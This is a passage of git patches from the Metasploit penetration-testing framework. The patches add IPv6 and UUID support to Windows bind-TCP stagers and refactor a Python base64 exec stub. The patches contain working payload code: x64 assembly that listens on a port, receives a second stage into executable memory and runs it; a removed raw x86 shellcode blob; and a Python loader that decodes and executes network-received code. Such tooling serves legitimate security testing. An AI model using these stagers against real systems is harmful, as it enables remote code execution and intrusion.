+        push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
         call ebp
         ^
       end
diff --git a/lib/msf/core/payload/windows/reverse_tcp.rb b/lib/msf/core/payload/windows/reverse_tcp.rb
index 4440166649..c8f3731104 100644
--- a/lib/msf/core/payload/windows/reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp.rb
@@ -82,6 +82,8 @@ module Payload::Windows::ReverseTcp
     # Reliability adds 10 bytes for recv error checks
     space += 10
 
+    space += uuid_required_size if include_send_uuid
+
     # The final estimated size
     space
   end
diff --git a/lib/msf/core/payload/windows/send_uuid.rb b/lib/msf/core/payload/windows/send_uuid.rb
index 556bd49335..234c24b5b2 100644
--- a/lib/msf/core/payload/windows/send_uuid.rb
+++ b/lib/msf/core/payload/windows/send_uuid.rb
@@ -38,6 +38,16 @@ module Payload::Windows::SendUUID
     asm
   end
 
+  def uuid_required_size
+    # Start with the number of bytes required for the instructions
+    space = 17
+
+    # a UUID is 16 bytes
+    space += 16
+
+    space
+  end
+
 end
 
 end
diff --git a/lib/msf/core/payload/windows/x64/bind_tcp.rb b/lib/msf/core/payload/windows/x64/bind_tcp.rb
index f7f032dc8c..52e2cc352e 100644
--- a/lib/msf/core/payload/windows/x64/bind_tcp.rb
+++ b/lib/msf/core/payload/windows/x64/bind_tcp.rb
@@ -48,6 +48,10 @@ module Payload::Windows::BindTcp_x64
     false
   end
 
+  def use_ipv6
+    false
+  end
+
   def transport_config(opts={})
     transport_config_bind_tcp(opts)
   end
@@ -84,6 +88,11 @@ module Payload::Windows::BindTcp_x64
     # Reliability checks add 4 bytes for the first check, 5 per recv check (2)
     #space += 14
 
+    # 2 more bytes are added for IPv6
+    space += 2 if use_ipv6
+
+    space += uuid_required_size if include_send_uuid
+
     # The final estimated size
     space
   end
@@ -96,8 +105,18 @@ module Payload::Windows::BindTcp_x64
   # @option opts [Bool] :reliable Whether or not to enable error handling code
   #
   def asm_bind_tcp(opts={})
-    reliable     = opts[:reliable]
-    encoded_port = "0x%.16x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
+    reliable      = opts[:reliable]
+    addr_fam      = 2
+    sockaddr_size = 16
+    stack_alloc   = 408+8+8*6+32*7
+
+    if use_ipv6
+      addr_fam      = 23
+      sockaddr_size = 28
+      stack_alloc  += 8*2 # two more rax pushes
+    end
+
+    encoded_port = "0x%.16x" % [opts[:port].to_i, addr_fam].pack("vn").unpack("N").first
 
     asm = %Q^
       bind_tcp:
@@ -108,57 +127,80 @@ module Payload::Windows::BindTcp_x64
         sub rsp, 408+8         ; alloc sizeof( struct WSAData ) bytes for the WSAData
                                ; structure (+8 for alignment)
         mov r13, rsp           ; save pointer to the WSAData structure for WSAStartup call.
-        mov r12, #{encoded_port}        
-        push r12               ; bind to 0.0.0.0 family AF_INET and port 4444
+        xor rax, rax
+    ^
+
+    if use_ipv6
+      asm << %Q^
+        ; IPv6 requires another 12 zero-bytes for the socket structure,
+        ; so push 16 more onto the stack
+        push rax
+        push rax
+      ^
+    end
+
+    asm << %Q^
+        push rax               ; stack alignment
+        push rax               ; tail-end of the sockaddr_in/6 struct
+        mov r12, #{encoded_port}
+        push r12               ; bind to 0.0.0.0/[::] family AF_INET/6 and specified port
         mov r12, rsp           ; save pointer to sockaddr_in struct for bind call
+
         ; perform the call to LoadLibraryA...
         mov rcx, r14           ; set the param for the library to load
-        mov r10d, 0x0726774C   ; hash( "kernel32.dll", "LoadLibraryA" )
+        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
         call rbp               ; LoadLibraryA( "ws2_32" )
+
         ; perform the call to WSAStartup...
         mov rdx, r13           ; second param is a pointer to this stuct
         push 0x0101            ;
         pop rcx                ; set the param for the version requested
-        mov r10d, 0x006B8029   ; hash( "ws2_32.dll", "WSAStartup" )
+        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
         call rbp               ; WSAStartup( 0x0101, &WSAData );
+
         ; perform the call to WSASocketA...
+        push #{addr_fam}       ; push AF_INET/6
+        pop rcx                ; pop family into rcx
         push rax               ; if we succeed, rax wil be zero, push zero for the flags param.
         push rax               ; push null for reserved parameter
         xor r9, r9             ; we do not specify a WSAPROTOCOL_INFO structure
         xor r8, r8             ; we do not specify a protocol
         inc rax                ;
         mov rdx, rax           ; push SOCK_STREAM
-        inc rax                ;
-        mov rcx, rax           ; push AF_INET
-        mov r10d, 0xE0DF0FEA   ; hash( "ws2_32.dll", "WSASocketA" )
-        call rbp               ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
+        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
+        call rbp               ; WSASocketA( AF_INET/6, SOCK_STREAM, 0, 0, 0, 0 );
         mov rdi, rax           ; save the socket for later
+
         ; perform the call to bind...
-        push 16                ; 
+        push #{sockaddr_size}
         pop r8                 ; length of the sockaddr_in struct (we only set the
-                               ; first 8 bytes as the last 8 are unused)
+                               ; first 8 bytes as the rest aren't used)
         mov rdx, r12           ; set the pointer to sockaddr_in struct
         mov rcx, rdi           ; socket
-        mov r10d, 0x6737DBC2   ; hash( "ws2_32.dll", "bind" )
-        call rbp               ; bind( s, &sockaddr_in, 16 );
+        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'bind')}
+        call rbp               ; bind( s, &sockaddr_in, #{sockaddr_size} );
+
         ; perform the call to listen...
         xor rdx, rdx           ; backlog
         mov rcx, rdi           ; socket
-        mov r10d, 0xFF38E9B7   ; hash( "ws2_32.dll", "listen" )
+        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'listen')}
         call rbp               ; listen( s, 0 );
+
         ; perform the call to accept...
         xor r8, r8             ; we set length for the sockaddr struct to zero
         xor rdx, rdx           ; we dont set the optional sockaddr param
         mov rcx, rdi           ; listening socket
-        mov r10d, 0xE13BEC74   ; hash( "ws2_32.dll", "accept" )
+        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'accept')}
         call rbp               ; accept( s, 0, 0 );
+
         ; perform the call to closesocket...
         mov rcx, rdi           ; the listening socket to close
         mov rdi, rax           ; swap the new connected socket over the listening socket
-        mov r10d, 0x614D6E75   ; hash( "ws2_32.dll", "closesocket" )
+        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
         call rbp               ; closesocket( s );
+
         ; restore RSP so we dont have any alignment issues with the next block...
-        add rsp, #{408+8+8*4+32*7} ; cleanup the stack allocations
+        add rsp, #{stack_alloc} ; cleanup the stack allocations
     ^
 
     asm << asm_send_uuid if include_send_uuid
@@ -172,9 +214,10 @@ module Payload::Windows::BindTcp_x64
         push 4                 ; 
         pop r8                 ; length = sizeof( DWORD );
         mov rcx, rdi           ; the saved socket
-        mov r10d, 0x5FC8D902   ; hash( "ws2_32.dll", "recv" )
+        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
         call rbp               ; recv( s, &dwLength, 4, 0 );
         add rsp, 32            ; we restore RSP from the api_call so we can pop off RSI next
+
         ; Alloc a RWX buffer for the second stage
         pop rsi                ; pop off the second stage length
         push 0x40              ; 
@@ -183,18 +226,21 @@ module Payload::Windows::BindTcp_x64
         pop r8                 ; MEM_COMMIT
         mov rdx, rsi           ; the newly recieved second stage length.
         xor rcx, rcx           ; NULL as we dont care where the allocation is.
-        mov r10d, 0xE553A458   ; hash( "kernel32.dll", "VirtualAlloc" )
+        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
         call rbp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
+
         ; Receive the second stage and execute it...
         mov rbx, rax           ; rbx = our new memory address for the new stage
         mov r15, rax           ; save the address so we can jump into it later
+
       read_more:               ;
         xor r9, r9             ; flags
         mov r8, rsi            ; length
         mov rdx, rbx           ; the current address into our second stages RWX buffer
         mov rcx, rdi           ; the saved socket
-        mov r10d, 0x5FC8D902   ; hash( "ws2_32.dll", "recv" )
+        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
         call rbp               ; recv( s, buffer, length, 0 );
+
         add rbx, rax           ; buffer += bytes_received
         sub rsi, rax           ; length -= bytes_received
         test rsi, rsi          ; test length
diff --git a/lib/msf/core/payload/windows/x64/reverse_tcp.rb b/lib/msf/core/payload/windows/x64/reverse_tcp.rb
index 9101a147e1..6be0bfdd1b 100644
--- a/lib/msf/core/payload/windows/x64/reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_tcp.rb
@@ -90,6 +90,8 @@ module Payload::Windows::ReverseTcp_x64
     # Reliability adds 10 bytes for recv error checks
     space += 10
 
+    space += uuid_required_size if include_send_uuid
+
     # The final estimated size
     space
   end
diff --git a/lib/msf/core/payload/windows/x64/send_uuid.rb b/lib/msf/core/payload/windows/x64/send_uuid.rb
index b953425090..8693109e95 100644
--- a/lib/msf/core/payload/windows/x64/send_uuid.rb
+++ b/lib/msf/core/payload/windows/x64/send_uuid.rb
@@ -40,6 +40,16 @@ module Payload::Windows::SendUUID_x64
     asm
   end
 
+  def uuid_required_size
+    # Start with the number of bytes required for the instructions
+    space = 25
+
+    # a UUID is 16 bytes
+    space += 16
+
+    space
+  end
+
 end
 
 end
diff --git a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb
index aabb84b75c..10aeea1af4 100644
--- a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb
+++ b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb
@@ -6,14 +6,14 @@
 
 require 'msf/core'
 require 'msf/core/handler/bind_tcp'
+require 'msf/core/payload/windows/bind_tcp'
 
-
-module Metasploit3
+module Metasploit4
 
   CachedSize = 285
 
   include Msf::Payload::Stager
-  include Msf::Payload::Windows
+  include Msf::Payload::Windows::BindTcp
 
   def self.handler_type_alias
     "bind_ipv6_tcp"
@@ -21,43 +21,20 @@ module Metasploit3
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Bind TCP Stager (IPv6)',
-      'Description'   => 'Listen for a connection over IPv6',
-      'Author'        => ['hdm', 'skape'],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'win',
-      'Arch'          => ARCH_X86,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Convention'    => 'sockedi',
-      'Stager'        =>
-        {
-          'Offsets' =>
-            {
-              'LPORT'   => [ 192, 'n' ],
-            },
-          # Technically this is the same as bind_tcp, but has been duplicated for
-          # backwards compatibility with tools that expect this payload name.
-          'Payload' =>
-            "\xFC\xE8\x82\x00\x00\x00\x60\x89\xE5\x31\xC0\x64\x8B\x50\x30\x8B" +
-            "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\xAC\x3C" +
-            "\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF2\x52\x57\x8B\x52" +
-            "\x10\x8B\x4A\x3C\x8B\x4C\x11\x78\xE3\x48\x01\xD1\x51\x8B\x59\x20" +
-            "\x01\xD3\x8B\x49\x18\xE3\x3A\x49\x8B\x34\x8B\x01\xD6\x31\xFF\xAC" +
-            "\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF6\x03\x7D\xF8\x3B\x7D\x24\x75" +
-            "\xE4\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3" +
-            "\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF" +
-            "\xE0\x5F\x5F\x5A\x8B\x12\xEB\x8D\x5D\x68\x33\x32\x00\x00\x68\x77" +
-            "\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF\xD5\xB8\x90\x01\x00\x00" +
-            "\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF\xD5\x6A\x08\x59\x50\xE2" +
-            "\xFD\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5\x97\x68\x02\x00" +
-            "\x11\x5C\x89\xE6\x6A\x10\x56\x57\x68\xC2\xDB\x37\x67\xFF\xD5\x57" +
-            "\x68\xB7\xE9\x38\xFF\xFF\xD5\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57" +
-            "\x97\x68\x75\x6E\x4D\x61\xFF\xD5\x6A\x00\x6A\x04\x56\x57\x68\x02" +
-            "\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00\x56\x6A" +
-            "\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56\x53\x57\x68" +
-            "\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x75\xEE\xC3"
-        }
-      ))
+      'Name'        => 'Bind IPv6 TCP Stager (Windows x86)',
+      'Description' => 'Listen for an IPv6 connection (Windows x86)',
+      'Author'      => ['hdm', 'skape', 'sf'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'win',
+      'Arch'        => ARCH_X86,
+      'Handler'     => Msf::Handler::BindTcp,
+      'Convention'  => 'sockedi',
+      'Stager'      => { 'RequiresMidstager' => false }
+    ))
+  end
+
+  def use_ipv6
+    true
   end
 
 end
diff --git a/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb b/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb
new file mode 100644
index 0000000000..8401c8d861
--- /dev/null
+++ b/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb
@@ -0,0 +1,45 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/core/payload/windows/bind_tcp'
+
+module Metasploit4
+
+  CachedSize = 285
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Windows::BindTcp
+
+  def self.handler_type_alias
+    "bind_ipv6_tcp_uuid"
+  end
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'Bind IPv6 TCP Stager with UUID Support (Windows x86)',
+      'Description' => 'Listen for an IPv6 connection with UUID Support (Windows x86)',
+      'Author'      => ['hdm', 'skape', 'sf'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'win',
+      'Arch'        => ARCH_X86,
+      'Handler'     => Msf::Handler::BindTcp,
+      'Convention'  => 'sockedi',
+      'Stager'      => { 'RequiresMidstager' => false }
+    ))
+  end
+
+  def use_ipv6
+    true
+  end
+
+  def include_send_uuid
+    true
+  end
+
+end
+
diff --git a/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb
new file mode 100644
index 0000000000..27ac40863d
--- /dev/null
+++ b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb
@@ -0,0 +1,40 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/core/payload/windows/x64/bind_tcp'
+
+module Metasploit4
+
+  CachedSize = 479
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Windows::BindTcp_x64
+
+  def self.handler_type_alias
+    "bind_ipv6_tcp"
+  end
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Windows x64 IPv6 Bind TCP Stager',
+      'Description'   => 'Listen for an IPv6 connection (Windows x64)',
+      'Author'        => [ 'sf' ],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'win',
+      'Arch'          => ARCH_X86_64,
+      'Handler'       => Msf::Handler::BindTcp,
+      'Convention'    => 'sockrdi',
+      'Stager'        => { 'RequiresMidstager' => false }
+      ))
+  end
+
+  def use_ipv6
+    true
+  end
+
+end
+
diff --git a/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb
new file mode 100644
index 0000000000..25be549fe8
--- /dev/null
+++ b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb
@@ -0,0 +1,45 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/core/payload/windows/x64/bind_tcp'
+
+module Metasploit4
+
+  CachedSize = 479
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Windows::BindTcp_x64
+
+  def self.handler_type_alias
+    "bind_ipv6_tcp_uuid"
+  end
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Windows x64 IPv6 Bind TCP Stager with UUID Support',
+      'Description'   => 'Listen for an IPv6 connection with UUID Support (Windows x64)',
+      'Author'        => [ 'sf' ],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'win',
+      'Arch'          => ARCH_X86_64,
+      'Handler'       => Msf::Handler::BindTcp,
+      'Convention'    => 'sockrdi',
+      'Stager'        => { 'RequiresMidstager' => false }
+      ))
+  end
+
+  def use_ipv6
+    true
+  end
+
+  def include_send_uuid
+    true
+  end
+
+end
+
+

From e103b2365aaa3e0e39fdd2a48c023135c6c0abe9 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Mon, 25 May 2015 11:31:15 +1000
Subject: [PATCH 0174/1013] Update payload sizes and add new payloads to spec

---
 .../stagers/windows/bind_ipv6_tcp_uuid.rb     |  2 +-
 .../stagers/windows/x64/bind_ipv6_tcp.rb      |  2 +-
 .../stagers/windows/x64/bind_ipv6_tcp_uuid.rb |  2 +-
 .../payloads/stagers/windows/x64/bind_tcp.rb  |  2 +-
 .../stagers/windows/x64/bind_tcp_uuid.rb      |  2 +-
 spec/modules/payloads_spec.rb                 | 33 +++++++++++++++++++
 6 files changed, 38 insertions(+), 5 deletions(-)

diff --git a/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb b/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb
index 8401c8d861..b0a0907882 100644
--- a/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb
+++ b/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb
@@ -10,7 +10,7 @@ require 'msf/core/payload/windows/bind_tcp'
 
 module Metasploit4
 
-  CachedSize = 285
+  CachedSize = 318
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows::BindTcp
diff --git a/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb
index 27ac40863d..3e2b01bdd6 100644
--- a/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb
+++ b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/windows/x64/bind_tcp'
 
 module Metasploit4
 
-  CachedSize = 479
+  CachedSize = 483
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows::BindTcp_x64
diff --git a/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb
index 25be549fe8..a23f337148 100644
--- a/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb
+++ b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/windows/x64/bind_tcp'
 
 module Metasploit4
 
-  CachedSize = 479
+  CachedSize = 524
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows::BindTcp_x64
diff --git a/modules/payloads/stagers/windows/x64/bind_tcp.rb b/modules/payloads/stagers/windows/x64/bind_tcp.rb
index b7dec4b64c..547e323d9f 100644
--- a/modules/payloads/stagers/windows/x64/bind_tcp.rb
+++ b/modules/payloads/stagers/windows/x64/bind_tcp.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/windows/x64/bind_tcp'
 
 module Metasploit4
 
-  CachedSize = 479
+  CachedSize = 481
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows::BindTcp_x64
diff --git a/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb b/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb
index ee698c5933..ab3402808d 100644
--- a/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb
+++ b/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/windows/x64/bind_tcp'
 
 module Metasploit4
 
-  CachedSize = 520
+  CachedSize = 522
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows::BindTcp_x64
diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb
index 0348f2e3a4..998d3fccad 100644
--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -2642,6 +2642,17 @@ describe 'modules/payloads', :content do
                           reference_name: 'windows/meterpreter/bind_ipv6_tcp'
   end
 
+  context 'windows/meterpreter/bind_ipv6_tcp_uuid' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'stagers/windows/bind_ipv6_tcp_uuid',
+                              'stages/windows/meterpreter'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'windows/meterpreter/bind_ipv6_tcp_uuid'
+  end
+
   context 'windows/meterpreter/bind_nonx_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [
@@ -3656,6 +3667,28 @@ describe 'modules/payloads', :content do
                           reference_name: 'windows/x64/loadlibrary'
   end
 
+  context 'windows/x64/meterpreter/bind_ipv6_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'stagers/windows/x64/bind_ipv6_tcp',
+                              'stages/windows/x64/meterpreter'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'windows/x64/meterpreter/bind_ipv6_tcp'
+  end
+
+  context 'windows/x64/meterpreter/bind_ipv6_tcp_uuid' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'stagers/windows/x64/bind_ipv6_tcp_uuid',
+                              'stages/windows/x64/meterpreter'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'windows/x64/meterpreter/bind_ipv6_tcp_uuid'
+  end
+
   context 'windows/x64/meterpreter/bind_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [

From 43f7054a5c1bbd9ca1974f21905a6c5d71d1fe9d Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Mon, 25 May 2015 11:51:01 +1000
Subject: [PATCH 0175/1013] Refactor base64 stub into base module

As per @zeroSteiner's suggestion.
---
 lib/msf/core/payload/python.rb             | 17 +++++++++++++++++
 lib/msf/core/payload/python/bind_tcp.rb    |  8 ++------
 lib/msf/core/payload/python/reverse_tcp.rb |  8 ++------
 3 files changed, 21 insertions(+), 12 deletions(-)

diff --git a/lib/msf/core/payload/python.rb b/lib/msf/core/payload/python.rb
index 383b3694a9..c2bae66e02 100644
--- a/lib/msf/core/payload/python.rb
+++ b/lib/msf/core/payload/python.rb
@@ -3,4 +3,21 @@ require 'msf/core'
 
 module Msf::Payload::Python
 
+  #
+  # Encode the given python command in base64 and wrap it with a stub
+  # that will decode and execute it on the fly.
+  #
+  # @param cmd [String] The python code to execute.
+  # @return [String] Full python stub to execute the command.
+  #
+  def py_create_exec_stub(cmd)
+    # Base64 encoding is required in order to handle Python's formatting
+    # requirements in the while loop
+    b64_stub  = "import base64,sys;exec(base64.b64decode("
+    b64_stub << "{2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('"
+    b64_stub << Rex::Text.encode_base64(cmd)
+    b64_stub << "')))"
+    b64_stub
+  end
+
 end
diff --git a/lib/msf/core/payload/python/bind_tcp.rb b/lib/msf/core/payload/python/bind_tcp.rb
index ff63f914b4..b6afbaa1b5 100644
--- a/lib/msf/core/payload/python/bind_tcp.rb
+++ b/lib/msf/core/payload/python/bind_tcp.rb
@@ -13,6 +13,7 @@ module Msf
 
 module Payload::Python::BindTcp
 
+  include Msf::Payload::Python
   include Msf::Payload::Python::SendUUID
 
   #
@@ -52,12 +53,7 @@ module Payload::Python::BindTcp
     cmd << "\td+=s.recv(l-len(d))\n"
     cmd << "exec(d,{'s':s})\n"
 
-    # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
-    b64_stub  = "import base64,sys;exec(base64.b64decode("
-    b64_stub << "{2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('"
-    b64_stub << Rex::Text.encode_base64(cmd)
-    b64_stub << "')))"
-    b64_stub
+    py_create_exec_stub(cmd)
   end
 
   def handle_intermediate_stage(conn, payload)
diff --git a/lib/msf/core/payload/python/reverse_tcp.rb b/lib/msf/core/payload/python/reverse_tcp.rb
index 1f263f9003..c693829829 100644
--- a/lib/msf/core/payload/python/reverse_tcp.rb
+++ b/lib/msf/core/payload/python/reverse_tcp.rb
@@ -13,6 +13,7 @@ module Msf
 
 module Payload::Python::ReverseTcp
 
+  include Msf::Payload::Python
   include Msf::Payload::Python::SendUUID
 
   #
@@ -52,12 +53,7 @@ module Payload::Python::ReverseTcp
     cmd << "\td+=s.recv(l-len(d))\n"
     cmd << "exec(d,{'s':s})\n"
 
-    # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
-    b64_stub  = "import base64,sys;exec(base64.b64decode("
-    b64_stub << "{2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('"
-    b64_stub << Rex::Text.encode_base64(cmd)
-    b64_stub << "')))"
-    b64_stub
+    py_create_exec_stub(cmd)
   end
 
   def handle_intermediate_stage(conn, payload)

From 7f59a7482efeefe3ee688cb921862b1ecc4a1152 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Mon, 25 May 2015 12:02:52 +1000
Subject: [PATCH 0176/1013] Update authors and stuff

---
 modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb        | 2 +-
 modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb     | 5 +++--
 modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb         | 4 ++--
 modules/payloads/stagers/php/bind_tcp_uuid.rb              | 4 ++--
 modules/payloads/stagers/php/reverse_tcp_uuid.rb           | 2 +-
 modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb     | 2 +-
 modules/payloads/stagers/windows/bind_tcp_uuid.rb          | 2 +-
 modules/payloads/stagers/windows/reverse_tcp_uuid.rb       | 2 +-
 modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb | 4 ++--
 modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb      | 2 +-
 modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb   | 2 +-
 11 files changed, 16 insertions(+), 15 deletions(-)

diff --git a/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb b/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb
index ee806bcde8..6ee52b7a80 100644
--- a/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb
+++ b/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb
@@ -22,7 +22,7 @@ module Metasploit4
     super(merge_info(info,
       'Name'        => 'Bind TCP Stager with UUID Support (Linux x86)',
       'Description' => 'Listen for a connection with UUID Support (Linux x86)',
-      'Author'      => [ 'skape', 'egypt' ],
+      'Author'      => [ 'skape', 'egypt', 'OJ Reeves' ],
       'License'     => MSF_LICENSE,
       'Platform'    => 'linux',
       'Arch'        => ARCH_X86,
diff --git a/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb b/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb
index f31c72d104..fa08274121 100644
--- a/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb
@@ -23,12 +23,13 @@ module Metasploit4
     super(merge_info(info,
       'Name'        => 'Reverse TCP Stager',
       'Description' => 'Connect back to the attacker',
-      'Author'      => [ 'skape', 'egypt' ],
+      'Author'      => [ 'skape', 'egypt', 'OJ Reeves' ],
       'License'     => MSF_LICENSE,
       'Platform'    => 'linux',
       'Arch'        => ARCH_X86,
       'Handler'     => Msf::Handler::ReverseTcp,
-      'Stager'      => { 'Payload' => '' }))
+      'Stager'      => { 'Payload' => '' }
+    ))
   end
 
   #
diff --git a/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb b/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb
index 1b48521d2c..9ef4a17a0a 100644
--- a/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb
+++ b/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb
@@ -22,13 +22,13 @@ module Metasploit4
     super(merge_info(info,
       'Name'        => 'Bind TCP Stager IPv6 with UUID Support',
       'Description' => 'Listen for a connection over IPv6 with UUID Support',
-      'Author'      => ['egypt'],
+      'Author'      => [ 'egypt', 'OJ Reeves' ],
       'License'     => MSF_LICENSE,
       'Platform'    => 'php',
       'Arch'        => ARCH_PHP,
       'Handler'     => Msf::Handler::BindTcp,
       'Stager'      => { 'Payload' => "" }
-      ))
+    ))
   end
 
   def use_ipv6
diff --git a/modules/payloads/stagers/php/bind_tcp_uuid.rb b/modules/payloads/stagers/php/bind_tcp_uuid.rb
index 1ba9da4899..e31bd5a8ce 100644
--- a/modules/payloads/stagers/php/bind_tcp_uuid.rb
+++ b/modules/payloads/stagers/php/bind_tcp_uuid.rb
@@ -22,13 +22,13 @@ module Metasploit4
     super(merge_info(info,
